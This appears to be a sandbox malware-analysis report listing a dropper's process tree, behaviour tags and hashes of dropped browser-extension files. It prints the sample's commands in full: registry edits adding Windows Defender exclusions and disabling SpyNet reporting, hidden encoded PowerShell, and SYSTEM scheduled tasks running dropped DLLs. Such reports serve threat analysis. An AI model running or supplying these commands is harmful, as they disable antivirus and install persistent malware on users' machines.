                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                                                                                            3⤵
                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                            PID:684
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                                                                            3⤵
                                                                                                                                                              PID:4040
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                                                                              3⤵
                                                                                                                                                                PID:344
                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FohpjzYDshfCC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FohpjzYDshfCC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IoHaAJhEDYhU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IoHaAJhEDYhU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KCGdmeQdU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KCGdmeQdU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hgFvgKbJayUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hgFvgKbJayUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\uqeRQcQeSVSWnHVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\uqeRQcQeSVSWnHVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\RZfGRCgJsrDIEOco\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\RZfGRCgJsrDIEOco\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                                                              2⤵
                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                              PID:3256
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IoHaAJhEDYhU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:1108
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:4596
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\RZfGRCgJsrDIEOco /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:2004
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\RZfGRCgJsrDIEOco /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:1540
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\vYzpyBFfHhXPDWiMt /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:684
                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:3948
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:4140
                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\uqeRQcQeSVSWnHVB /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                              3⤵
                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                              PID:3216
                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\uqeRQcQeSVSWnHVB /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:4940
                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hgFvgKbJayUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:2384
                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hgFvgKbJayUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:4788
                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:4548
                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:1304
                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KCGdmeQdU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                        3⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                                                        PID:4628
                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KCGdmeQdU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:3436
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IoHaAJhEDYhU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:4624
                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FohpjzYDshfCC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:4220
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FohpjzYDshfCC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:4444
                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                              schtasks /run /I /tn "gHYQTOEqs"
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:4408
                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                schtasks /CREATE /TN "gHYQTOEqs" /SC once /ST 01:28:33 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                PID:3376
                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                schtasks /DELETE /F /TN "gHYQTOEqs"
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:2384
                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                  schtasks /CREATE /TN "YsLxjqvMZrWymyIEG" /SC once /ST 01:53:06 /RU "SYSTEM" /TR "\"C:\Windows\Temp\RZfGRCgJsrDIEOco\aRhQLhcCIAxmkyn\DaVCgKH.exe\" s7 /jpsite_idZzX 385118 /S" /V1 /F
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                  PID:428
                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                  schtasks /run /I /tn "YsLxjqvMZrWymyIEG"
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                  PID:4380
                                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                1⤵
                                                                                                                                                                                                  PID:4888
                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                    PID:5076
                                                                                                                                                                                                    • C:\Windows\system32\gpupdate.exe
                                                                                                                                                                                                      "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:1344
                                                                                                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                      c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                        PID:4832
                                                                                                                                                                                                      • \??\c:\windows\system32\gpscript.exe
                                                                                                                                                                                                        gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:376
                                                                                                                                                                                                        • C:\Windows\Temp\RZfGRCgJsrDIEOco\aRhQLhcCIAxmkyn\DaVCgKH.exe
                                                                                                                                                                                                          C:\Windows\Temp\RZfGRCgJsrDIEOco\aRhQLhcCIAxmkyn\DaVCgKH.exe s7 /jpsite_idZzX 385118 /S
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                          • Checks computer location settings
                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                          • Drops Chrome extension
                                                                                                                                                                                                          • Drops desktop.ini file(s)
                                                                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                                                          PID:4124
                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                            schtasks /DELETE /F /TN "bwKBwqZYjkqxftWshF"
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:784
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                              • Blocklisted process makes network request
                                                                                                                                                                                                              PID:988
                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:2512
                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:1472
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                    PID:3844
                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\KCGdmeQdU\YuRwjW.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "SMPpzaSdDqsJvHF" /V1 /F
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                  PID:4408
                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                  schtasks /CREATE /TN "SMPpzaSdDqsJvHF2" /F /xml "C:\Program Files (x86)\KCGdmeQdU\VhEuAwB.xml" /RU "SYSTEM"
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                  PID:1088
                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                  schtasks /END /TN "SMPpzaSdDqsJvHF"
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:2112
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                    schtasks /DELETE /F /TN "SMPpzaSdDqsJvHF"
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:1616
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                      schtasks /CREATE /TN "znrIDUvoucqewg" /F /xml "C:\Program Files (x86)\IoHaAJhEDYhU2\soFWKuP.xml" /RU "SYSTEM"
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                      PID:2420
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                      schtasks /CREATE /TN "KVEvoYrDZKLqM2" /F /xml "C:\ProgramData\uqeRQcQeSVSWnHVB\LuEpIZK.xml" /RU "SYSTEM"
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                      PID:4600
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                      schtasks /CREATE /TN "RHUfDusjVndeEILcZ2" /F /xml "C:\Program Files (x86)\bYkzgWxJAWlLeHAUHjR\Bzxhiob.xml" /RU "SYSTEM"
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                      PID:3716
                                                                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:3252
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                        schtasks /CREATE /TN "BxzpJXegsLHBOSWsuyU2" /F /xml "C:\Program Files (x86)\FohpjzYDshfCC\soCnIyx.xml" /RU "SYSTEM"
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                        PID:3696
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                        schtasks /CREATE /TN "EtrQGzrpWMpnyWxNE" /SC once /ST 02:58:22 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\RZfGRCgJsrDIEOco\NTIlUwvl\dyJvYLl.dll\",#1 /Frsite_idCIP 385118" /V1 /F
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                        PID:3516
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                        schtasks /run /I /tn "EtrQGzrpWMpnyWxNE"
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:836
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                          cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:2904
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                              REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:884
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                                              PID:428
                                                                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:4788
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:4324
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                  schtasks /DELETE /F /TN "YsLxjqvMZrWymyIEG"
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                    PID:3092
                                                                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:1380
                                                                                                                                                                                                                                  • \??\c:\windows\system32\rundll32.EXE
                                                                                                                                                                                                                                    c:\windows\system32\rundll32.EXE "C:\Windows\Temp\RZfGRCgJsrDIEOco\NTIlUwvl\dyJvYLl.dll",#1 /Frsite_idCIP 385118
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:4308
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        c:\windows\system32\rundll32.EXE "C:\Windows\Temp\RZfGRCgJsrDIEOco\NTIlUwvl\dyJvYLl.dll",#1 /Frsite_idCIP 385118
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                        • Blocklisted process makes network request
                                                                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                                                                                                        PID:2240
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                          schtasks /DELETE /F /TN "EtrQGzrpWMpnyWxNE"
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:1612
                                                                                                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                PID:3436

                                                                                                                                                                                                                                        Network

                                                                                                                                                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                        Replay Monitor

                                                                                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                                                                                        Downloads

                                                                                                                                                                                                                                        • C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          1.4MB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          11b84ab1619d1be95777139c888553ed

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          39a6a36435608cb4de628dc8803e32d0136237ce

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          fd140a50e782f2169920f3eeeb554c1d95ff251f9476b1722908ed6947a67af0

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          a8b20b20b36ad31d6de9c831b52be1c22dafed4516a8e5c62946ac97d27bd0b716afbd1776018fc175240959e932973c0c34d2997fae136c54866e4fa42dd879

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          187B

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          2a1e12a4811892d95962998e184399d8

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          136B

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          238d2612f510ea51d0d3eaa09e7136b1

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          150B

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          6a51537cef82143d3d768759b21598542d683904

                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                          0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                          5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                          10KB

                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                          dfe20cd27e3daeb64823bdbb0f08c0ff

                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                          05c9725ee96ff71090522475d102938d9c37e744

